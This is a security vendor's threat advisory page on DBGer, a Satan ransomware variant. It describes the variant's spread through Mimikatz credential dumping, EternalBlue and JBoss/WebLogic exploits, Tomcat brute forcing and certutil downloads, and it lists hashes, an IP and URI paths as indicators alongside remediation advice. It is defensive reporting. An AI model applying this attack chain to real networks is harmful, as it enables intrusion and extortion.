logo_SVG-01
✕
  • Platform
    • Rewterz XDR
    • Rewterz Defense
    • Rewterz Threat Intelligence
    • Managed Security Services
    • Managed Penetration Testing
  • Services
    • Assess
      • Compromise Assessment
      • Advanced Persistent Threats Assessment
      • Penetration Testing
      • Secure Architecture Design & Review
      • Red Team Assessment
      • Purple Team Assessment
      • Social Engineering
      • Source Code Review
    • Transform
      • SOC Consultancy
      • SOC Maturity Assessment
      • SOC Model Evaluation
      • SOC Gap Analysis
      • SIEM Gap Analysis
      • SIEM Optimization
      • SOC Content Pack
    • Train
      • Simulated Cyber Attack Exercise
      • Tabletop Exercise
      • Security Awareness and Training
    • Respond
      • Incident Analysis
      • Incident Response
  • Solutions
  • Resources
    • Blogs
    • Press Releases
    • Threat Insights
      • Threat Intelligence Reports
      • Threat Advisories
      • Monthly Threat Insights
  • Why Rewterz?
    • About Us
    • Careers
    • Contact
logo_SVG-01
  • Platform
    xdrLogo
    center_new
    Read More about XDR

    Platform

    • Rewterz XDR
    • Rewterz Defense
    • Rewterz Threat Intelligence
    Rewterz Threat Advisory – New Variant of Satan Ransomware

    Managed Security Services

    • Managed Security Monitoring
    • Remote SOC
    • Onsite SOC
    • Hybrid SOC

    Managed Penetration Testing

    Rewterz penetration testing services help organizations determine if a cyber attacker can gain access to their critical assets while giving them detailed insights of the overall business impact of a cyber attack.

  • Services

    Assess

    • Compromise Assessment
    • APT Assessment
    • Penetration Testing
    • Architecture Design & Review
    • Red Team Assessment
    • Purple Team Assessment
    • Social Engineering
    • Source Code Review

    Transform

    • SOC Consultancy
    • SOC Maturity Assessment
    • SOC Model Evaluation
    • SOC Gap Analysis
    • SIEM Gap Analysis
    • SIEM Optimization
    • SOC Content Pack

    Train

    • Simulated Cyber Attack Exercise
    • Tabletop Exercise
    • Security Awareness and Training

    Respond

    • Incident Analysis
    • Incident Response
  • Solutions
  • Resources

    Resources

    • Blog
    • Press Releases
    March 15, 2023
    March 15, 2023
    Rewterz Threat Alert -New Golang-Based Botnet GoBruteforcer Breaches Web Servers – Active IOCs
    Severity High Analysis Summary According to researchers, a Golang-based botnet named GoBruteforcer has been discovered, which is specifically targeting web servers running FTP, MySQL, phpMyAdmin, and […]
    March 15, 2023
    March 15, 2023
    Rewterz Threat Alert – DarkComet RAT (Remote Access Trojan) – Active IOCs
    Severity High Analysis Summary DarkComet RAT (Remote Administration Tool) is a type of malware that is designed to allow attackers to gain remote access to a […]
    March 15, 2023
    March 15, 2023
    Rewterz Threat Advisory -Multiple Microsoft Windows Products Vulnerabilties
    Severity High Analysis Summary CVE-2023-23410 CVSS:7.8 Microsoft Windows could allow a local authenticated attacker to gain elevated privileges on the system, caused by a flaw in […]

    Threat Insights

    16
    pdf-file (1)
    Annual Threat Intelligence Report 2022
    • Threat Advisories
    • Monthly Threat Insights
    • Threat Intelligence Reports
  • Why Rewterz?

    About Us

    Before Rewterz got its start, the market was in dire need of a specialized and dedicated information security company. It was nearly impossible for businesses to find a trustworthy provider that could truly cover all of their bases. We wanted to meet this need, giving companies across the globe a chance to get ahead while knowing that their data is in good hands.

    Read More

    play_btn_Smallplay_btn_hover_Small
    leadership

    Our Leadership

    Our leadership team brings together years of knowledge and experience in cybersecurity to drive our company's mission and vision. Our team is passionate about delivering high-quality products and services, leading by example and assisting our clients in securing their organization’s environment.
    help

    CSR

    At Rewterz, we believe that businesses have a responsibility to impact positively and contribute to the well-being of our communities as well as the planet. That's why we are committed to operating in a socially responsible and sustainable way.

    Connect with Us

    • Contact
    • Careers
Get in Touch
logo_SVG-01
  • Platform
    xdrLogo
    center_new
    Read More about XDR

    Platform

    • Rewterz XDR
    • Rewterz Defense
    • Rewterz Threat Intelligence
    Rewterz Threat Advisory – New Variant of Satan Ransomware

    Managed Security Services

    • Managed Security Monitoring
    • Remote SOC
    • Onsite SOC
    • Hybrid SOC

    Managed Penetration Testing

    Rewterz penetration testing services help organizations determine if a cyber attacker can gain access to their critical assets while giving them detailed insights of the overall business impact of a cyber attack.

  • Services

    Assess

    • Compromise Assessment
    • APT Assessment
    • Penetration Testing
    • Architecture Design & Review
    • Red Team Assessment
    • Purple Team Assessment
    • Social Engineering
    • Source Code Review

    Transform

    • SOC Consultancy
    • SOC Maturity Assessment
    • SOC Model Evaluation
    • SOC Gap Analysis
    • SIEM Gap Analysis
    • SIEM Optimization
    • SOC Content Pack

    Train

    • Simulated Cyber Attack Exercise
    • Tabletop Exercise
    • Security Awareness and Training

    Respond

    • Incident Analysis
    • Incident Response
  • Solutions
  • Resources

    Resources

    • Blog
    • Press Releases
    March 15, 2023
    March 15, 2023
    Rewterz Threat Alert -New Golang-Based Botnet GoBruteforcer Breaches Web Servers – Active IOCs
    Severity High Analysis Summary According to researchers, a Golang-based botnet named GoBruteforcer has been discovered, which is specifically targeting web servers running FTP, MySQL, phpMyAdmin, and […]
    March 15, 2023
    March 15, 2023
    Rewterz Threat Alert – DarkComet RAT (Remote Access Trojan) – Active IOCs
    Severity High Analysis Summary DarkComet RAT (Remote Administration Tool) is a type of malware that is designed to allow attackers to gain remote access to a […]
    March 15, 2023
    March 15, 2023
    Rewterz Threat Advisory -Multiple Microsoft Windows Products Vulnerabilties
    Severity High Analysis Summary CVE-2023-23410 CVSS:7.8 Microsoft Windows could allow a local authenticated attacker to gain elevated privileges on the system, caused by a flaw in […]

    Threat Insights

    16
    pdf-file (1)
    Annual Threat Intelligence Report 2022
    • Threat Advisories
    • Monthly Threat Insights
    • Threat Intelligence Reports
  • Why Rewterz?

    About Us

    Before Rewterz got its start, the market was in dire need of a specialized and dedicated information security company. It was nearly impossible for businesses to find a trustworthy provider that could truly cover all of their bases. We wanted to meet this need, giving companies across the globe a chance to get ahead while knowing that their data is in good hands.

    Read More

    play_btn_Smallplay_btn_hover_Small
    leadership

    Our Leadership

    Our leadership team brings together years of knowledge and experience in cybersecurity to drive our company's mission and vision. Our team is passionate about delivering high-quality products and services, leading by example and assisting our clients in securing their organization’s environment.
    help

    CSR

    At Rewterz, we believe that businesses have a responsibility to impact positively and contribute to the well-being of our communities as well as the planet. That's why we are committed to operating in a socially responsible and sustainable way.

    Connect with Us

    • Contact
    • Careers
Get in Touch
Rewterz
Rewterz Threat Advisory – PDF attachment redirecting users to malicious site
June 26, 2018
Rewterz
Rewterz Threat Advisory – Cisco Firepower Management Center FTP Security Bypass Vulnerability
July 7, 2018

Rewterz Threat Advisory – New Variant of Satan Ransomware

July 5, 2018

This is an advisory on DBGer Ransomware; a New Variant of Satan Ransomware, which attacks and encrypts the victim’s host and requests a bitcoin payment.

 

IMPACT:  NORMAL

PUBLISH DATE:  05-07-2018

OVERVIEW

A new variant of Satan Ransomware was identified as DBGer. It works by dropping Mimikatz, dumping passwords for networked computers. The obtained credentials are then used to access and infect those devices. The malware also drops several EternalBlue files in the victim’s host. EternalBlue is used to scan the local network for computers with outdated SMB services and infects them.

The Satan ransomware also uses other exploits to propagate through networks. The DBGer exploits include:

  • JBoss CVE-2017-12149
  • Weblogic CVE-2017-10271
  • EternalBlue exploit CVE-2017-0143
  • Tomcat web application brute forcing
  • BACKGROUND INFORMATION:

Satan Ransomware was first discovered by security researchers in January 2017 as a Ransomware-as-a-Service (RaaS), which is now rebranded to the name DBGer Ransomware, as discovered by the MalwareHunter, whose Modus Operandi has also been changed. The new variant DBGer also uses the EternalBlue exploit and incorporates Mimikatz, an open-source password-dumping utility.

Satan Ransomware was identified as using the EternalBlue exploit to spread across compromised environments. This is the same exploit associated with a previous WannaCry Ransomware campaign. In March 2017, Microsoft patched the vulnerability associated with EternalBlue. However, many environments still remain vulnerable to it.

A cyber-attack involving ransomware means that the attacker encrypts the data on the compromised device and then asks for a bitcoin payment as ransom. If the attacked organization does not pay the ransom, the attacker has the monopoly of destroying the data of the compromised device or it may remain encrypted and the user fails to access it.

 

WORK ANALYSIS

The sample of the variant observed by MalwareHunter was packed with the MPRESS packer as shown below.

 

 

Sts.exe initiates the process of spreading across the network by scanning all the systems within the same network segment. Through the following command line, systems vulnerable to SMB EternalBlue exploit will execute the previously dropped library down64.dll.

The down64.dll attempts to load code in the target’s memory, and then downloads sts.exe, using the legitimate Microsoft certutil.exe tool. This is a known download technique described as Remote File Copy – T1105 in Mitre ATT&CK.After infecting other systems in the same network, the sample finally drops Satan Ransomware into C:\Satan.exe file. This executable is also packed with MPRESS as the original sample.

Executing Satan.exe starts the ransomware attack, which first stops the following processes:

The ransomware then proceeds to encrypt the data on the compromised device. After encryption, Satan.exe creates a note in  C:\_How_to_decrypt_files.txt with instructions, and then executes notepad to open the note.

The note contains the instructions to decrypt the system and a contact email address: satan_pro@mail[.]ru, requesting a Bitcoin payment as seen below in a sample of the note:

 

THREAT INDICATORS

File-Hashes

  • 3e3f8570c11dff0b5a0e061eae6bdd66cf9fa01d815658a0589d98873500358d
  • 15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13
  • b556b5c077e38dcb65d21a707c19618d02e0a65ff3f9887323728ec078660cc3
  • 15292172a83f2e7f07114693ab92753ed32311dfba7d54fe36cc7229136874d9
  • 0439628816cabe113315751e7113a9e9f720d7e499ffdd78acbac1ed8ba35887
  • 93027b47ef0b6f7d933017320951bbbeef792a8f1bc43b3fe96c2b61f1dc2636
  • cde45f7ff05f52b7215e4b0ea1f2f42ad9b42031e16a3be9772aa09e014bacdb
  • 85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5
  • ca63dbb99d9da431bf23aca80dc787df67bb01104fb9358a7813ed2fce479362
  • db0831e19a4e3a736ea7498dadc2d6702342f75fd8f7fbae1894ee2e9738c2b4
  • aa8adf96fc5a7e249a6a487faaf0ed3e00c40259fdae11d4caf47a24a9d3aaed
  • be8eb97d8171b8c91c6bc420346f7a6d2d2f76809a667ade03c990feffadaad5
  • 0259d41720f7084716a3b2bbe34ac6d3021224420f81a4e839b0b3401e5ef29f
  • 50f329e034db96ba254328cd1e0f588af6126c341ed92ddf4aeb96bc76835937
  • aceb27720115a63b9d47e737fd878a61c52435ea4ec86ba8e58ee744bc85c4f3
  • cf25bdc6711a72713d80a4a860df724a79042be210930dcbfc522da72b39bb12
  • b7d8fcc3fb533e5e0069e00bc5a68551479e54a990bb1b658e1bd092c0507d68
  • b2a3172a1d676f00a62df376d8da805714553bb3221a8426f9823a8a5887daaa
  • f0df80978b3a563077def7ba919e2f49e5883d24176e6b3371a8eef1efe2b06a
  • 5f30aa2fe338191b972705412b8043b0a134cdb287d754771fc225f2309e82ee
  • cf12eca0e10dc3370d7917e7678dc09629240d3e7cc71c5ac0df68576bea0682

 

IP Addresses

45.124.132.119

 

URI paths

/invoker/readonly

/orders.xhtml

/Clist1.jsp

/manager/html

/wls-wsat/CoordinatorPortType

 

RESOLVE

  • Update to the latest software version for your applications, especially those related to CVE-2017-12149, CVE-201710271, and CVE-2017-0143.
  • Ensure your organization is running an actively supported operating system that receives security updates.
  • Have effective patch management that deploys security updates to endpoints and other critical parts of your infrastructure in a timely manner.
  • Run anti-malware software on your system and ensure you regularly receive malware signature updates.
  • Do not click on any suspicious pop ups or download files from suspicious websites.
  • Ensure anti-virus software is updated with the latest signatures.
  • Monitor or block the indicators included in this report.
  • Implement a disaster recovery plan that includes backing up and restoring data from devices that are kept offline. Adversaries frequently target backup mechanisms to limit the possibilities a user may be able to restore their files without paying the ransom.

 

If you think you are a victim of a cyber-security attack. Immediately send an email to info@rewterz.com for a rapid response.

Platform

  • Rewterz XDR
  • Rewterz Defense
  • Rewterz Threat Intelligence

Managed Security Services

  • Managed Security Monitoring
  • Remote SOC
  • Onsite SOC
  • Hybrid SOC

Assess

  • Compromise Assessment
  • APT Assessment
  • Penetration Testing
  • Architecture Design & Review
  • Red Team Assessment
  • Purple Team Assessment
  • Social Engineering
  • Source Code Review

Transform

  • SOC Consultancy
  • SOC Maturity Assessment
  • SOC Model Evaluation
  • SOC Gap Analysis
  • SIEM Gap Analysis
  • SIEM Optimization
  • SOC Content Pack

Train

  • Simulated Cyber Attack Exercise
  • Tabletop Exercise
  • Security Awareness and Training

Respond

  • Incident Analysis
  • Incident Response

Threat Insights

  • Threat Advisories
  • Monthly Threat Insights
  • Threat Intelligence Reports

Resources

  • Blog
  • Press Releases

Connect With Us

  • Contact
  • Careers
COPYRIGHT © REWTERZ. ALL RIGHTS RESERVED.
Get a Demo